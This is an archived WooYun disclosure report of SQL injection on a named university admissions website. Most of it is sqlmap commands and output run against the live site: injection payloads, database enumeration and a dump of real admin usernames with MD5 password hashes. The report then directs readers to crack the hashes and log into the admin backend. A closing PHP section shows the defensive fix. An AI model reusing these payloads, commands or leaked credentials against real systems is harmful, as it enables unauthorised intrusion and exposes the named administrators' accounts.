WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
2015-02-11: Details have been sent to the vendor and are awaiting the vendor's handling.
2015-02-16: The vendor has actively ignored the vulnerability; details are disclosed to the public.
As titled.
The Harbin University of Commerce undergraduate admissions site, http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs, has an injection point.
Injection point: http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs
[01:01:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[01:01:48] [INFO] fetching database names
available databases [9]:
[*] cdcol
[*] hrb1
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth
[*] xsc

C:\sqlmap>sqlmap -u http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs -D hrb1 --tables

         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150128}
|_ -| . | | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|       http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 00:53:58

[00:53:59] [INFO] resuming back-end DBMS 'mysql'
[00:53:59] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=jxs' AND 3525=3525 AND 'oBkI'='oBkI

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=jxs' AND (SELECT 3143 FROM(SELECT COUNT(*),CONCAT(0x717a707671,(SELECT (CASE WHEN (3143=3143) THEN 1 ELSE 0 END)),0x716a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RytH'='RytH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: id=jxs' UNION ALL SELECT CONCAT(0x717a707671,0x4b775a685054564a4450,0x716a7a6b71)#

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: id=jxs'; SELECT SLEEP(5)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=jxs' AND SLEEP(5) AND 'EJyh'='EJyh
---
[00:53:59] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[00:53:59] [INFO] fetching tables for database: 'hrb1'
Database: hrb1
[18 tables]
+---------------------+
| admin_user          |
| college             |
| eduguide            |
| fangke              |
| in_out              |
| luqufenshu          |
| luqufenshu_full     |
| luqufenshu_info     |
| luqujieguo          |
| luquxinxi           |
| major               |
| online              |
| zhaosheng_gonggao   |
| zhaosheng_xinxi     |
| zhaosheng_zhengce   |
| zhaoshengjihua      |
| zhaoshengjihua_full |
| zhaoshengjihua_info |
+---------------------+

C:\sqlmap>sqlmap -u http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs -D hrb1 -T admin_user --columns

         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150128}
|_ -| . | | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|       http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 00:54:27

[00:54:27] [INFO] resuming back-end DBMS 'mysql'
[00:54:27] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=jxs' AND 3525=3525 AND 'oBkI'='oBkI

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=jxs' AND (SELECT 3143 FROM(SELECT COUNT(*),CONCAT(0x717a707671,(SELECT (CASE WHEN (3143=3143) THEN 1 ELSE 0 END)),0x716a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RytH'='RytH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: id=jxs' UNION ALL SELECT CONCAT(0x717a707671,0x4b775a685054564a4450,0x716a7a6b71)#

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: id=jxs'; SELECT SLEEP(5)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=jxs' AND SLEEP(5) AND 'EJyh'='EJyh
---
[00:54:28] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[00:54:28] [INFO] fetching columns for table 'admin_user' in database 'hrb1'
Database: hrb1
Table: admin_user
[4 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| admin_user_id   | int(3)      |
| admin_user_name | varchar(30) |
| admin_user_pwd  | varchar(32) |
| admin_user_time | int(12)     |
+-----------------+-------------+

[00:54:28] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\zsb.hrbcu.edu.cn'

[*] shutting down at 00:54:28

C:\sqlmap>sqlmap -u http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs -D hrb1 -T admin_user -C "admin_user_name, admin_user_pwd" --dump

         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150128}
|_ -| . | | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|       http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 00:54:59

[00:54:59] [INFO] resuming back-end DBMS 'mysql'
[00:54:59] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=jxs' AND 3525=3525 AND 'oBkI'='oBkI

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=jxs' AND (SELECT 3143 FROM(SELECT COUNT(*),CONCAT(0x717a707671,(SELECT (CASE WHEN (3143=3143) THEN 1 ELSE 0 END)),0x716a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RytH'='RytH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: id=jxs' UNION ALL SELECT CONCAT(0x717a707671,0x4b775a685054564a4450,0x716a7a6b71)#

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: id=jxs'; SELECT SLEEP(5)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=jxs' AND SLEEP(5) AND 'EJyh'='EJyh
---
[00:55:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[00:55:00] [INFO] fetching columns 'admin_user_name, admin_user_pwd' for table 'admin_user' in database 'hrb1'
[00:55:00] [WARNING] reflective value(s) found and filtering out
[00:55:00] [INFO] fetching entries of column(s) 'admin_user_name, admin_user_pwd' for table 'admin_user' in database 'hrb1'
[00:55:00] [INFO] analyzing table dump for possible password hashes
[00:55:00] [INFO] recognized possible password hashes in column 'admin_user_pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[00:55:04] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\sqlmap\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[00:55:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[00:55:07] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[00:55:07] [INFO] starting 2 processes
[00:55:52] [WARNING] no clear password(s) found
[00:55:52] [INFO] postprocessing table dump
Database: hrb1
Table: admin_user
[3 entries]
+-----------------+----------------------------------+
| admin_user_name | admin_user_pwd                   |
+-----------------+----------------------------------+
| admin           | 4d42625a4f1ceabfd9b0adedce5de94d |
| wangtao         | d163056c96097754156677a7375753ef |
| fengjianyuan    | d21abcb248174f8227db16aa3a833eca |
+-----------------+----------------------------------+
After cracking the MD5 hashes, log in to the admin backend: http://zsb.hrbcu.edu.cn/admin
Filter the input.
Severity: No impact (vendor ignored)
Ignored at: 2015-02-16 10:32
None yet.
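To make the "filter the input" fix concrete, the following is an added example (not code from the original report or from the affected site): the concatenation pattern that lets the id payloads above reach MySQL, beside a hardened lookup, plus the password-storage change the MD5 dump calls for. The table and column names mark_result and mark_id are assumed placeholders; admin_user and its columns are the names shown in the sqlmap output.

```php
<?php
// Added example, not code from the original report or the affected site.
// Assumption: markPResult.php looks up one record by the GET parameter "id"
// (values such as "jxs"). mark_result / mark_id are hypothetical placeholders;
// admin_user / admin_user_name / admin_user_pwd come from the sqlmap dump.
// Connect with emulated prepares off so binding happens server-side and the
// stacked-query technique listed above cannot chain a second statement:
//   $db = new PDO($dsn, $user, $pass, array(PDO::ATTR_EMULATE_PREPARES => false));

// Vulnerable pattern: the raw parameter is spliced into the SQL string, which
// is exactly what lets  id=jxs' AND SLEEP(5) AND 'EJyh'='EJyh  execute.
function lookupVulnerable(PDO $db, $id)
{
    $sql = "SELECT * FROM mark_result WHERE mark_id = '" . $id . "'";
    return $db->query($sql)->fetch(PDO::FETCH_ASSOC);
}

// Hardened pattern: reject anything outside the format the page expects, then
// pass the value as a bound parameter so quotes, comments and keywords in it
// are never parsed as SQL. Both steps together are the "filter" in the fix.
function lookupHardened(PDO $db, $id)
{
    if (!preg_match('/^[A-Za-z0-9_]{1,16}$/', $id)) {   // whitelist check
        return false;
    }
    $stmt = $db->prepare("SELECT * FROM mark_result WHERE mark_id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// The dump shows admin_user_pwd holding bare 32-hex MD5 digests, which sqlmap
// recognised and fed straight to a wordlist attack. Store salted, slow hashes
// instead; widen the column from varchar(32) to varchar(255) first.
// password_hash() needs PHP >= 5.5; on the PHP 5.3.8 seen here the
// password_compat library supplies the same two functions.
function setAdminPassword(PDO $db, $user, $password)
{
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt = $db->prepare(
        "UPDATE admin_user SET admin_user_pwd = :h WHERE admin_user_name = :u");
    return $stmt->execute(array(':h' => $hash, ':u' => $user));
}

function checkAdminPassword(PDO $db, $user, $password)
{
    $stmt = $db->prepare(
        "SELECT admin_user_pwd FROM admin_user WHERE admin_user_name = :u");
    $stmt->execute(array(':u' => $user));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['admin_user_pwd']);
}
```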